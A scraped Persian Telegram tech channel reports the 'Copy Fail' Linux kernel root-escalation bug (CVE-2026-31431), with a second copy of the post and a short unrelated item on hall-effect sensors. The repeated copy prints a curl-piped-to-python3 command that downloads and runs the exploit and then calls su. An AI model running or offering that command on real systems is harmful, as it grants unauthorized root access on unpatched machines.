محقق شرکت امنیتی Theori با کمک پلتفرم تست نفوذ با هوش مصنوعی Xint موفق شده حفره امنیتی خطرناکی در هسته لینوکس رو کشف کنه که به هر فایل اجرایی امکان گرفتن دسترسی روت روی تقریبا هر توزیع لینوکسی رو فراهم میکنه!
این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!
این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال 2017 تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.
برای استفاده از اون فقط کافیه یک فایل 732 بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیاده سازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
در حال حاضر این باگ در اپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این اپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.
🔎 xint
📍 @TechTube
این حفره موسوم به Copy Fail با کد CVE-2026-31431 به دلیل باگی در سیستم کش فایل هسته لینوکس به وجود اومده که با دستکاری باینری کش شده setuid-root میتونه دسترسی روت دریافت کنه و کل سیستم رو کنترل کنه و مخفی بمونه. حتی در برخی حالات امکان دسترسی به هاست از داخل یک کانتینرها هم میتونه ممکن باشه!
این باگ تقریبا روی هر توزیعی که از هسته لینوکسِ عرضه شده از سال 2017 تاکنون استفاده میکنه، قابل اجرا هست و روی توزیعهایی مثل Ubuntu، SUSE، RHEL و غیره تست شده.
برای استفاده از اون فقط کافیه یک فایل 732 بایتی پایتون رو اجرا کرد تا در کسری از ثانیه روی سیستمی با یوزر عادی، دسترسی روت بگیره. کدهای اون هم با بقیه زبانها از جمله Go هم پیاده سازی شدن. برای تست راحت اون (که نیاز به اینترنت برای دریافت کدها داره) میتونید از دستور زیر استفاده کنید:
curl https://copy.fail/exp | python3 && su
در حال حاضر این باگ در اپدیت جدید هسته لینوکس اصلاح شده ولی فقط توزیعهای مبتنی بر ارچ این اپدیت رو اعمال کردن و توزیعهای دیگه از جمله اوبونتو، دبیان و فدورا همچنان در حال رفع این باگ هستن.
🔎 xint
📍 @TechTube
🔥8💩2🤯1
This media is not supported in your browser
VIEW IN TELEGRAM
ایده ارزون و خلاقانه به جای روتاری انکودرهای مطلق برای پروژههای آماتوری. از یه آرایه سنسور هال افکت و دوتا مگنت استفاده کرده جای روشهایی گرون و کمیاب.
منبع
📡openpcb
منبع
📡openpcb
❤7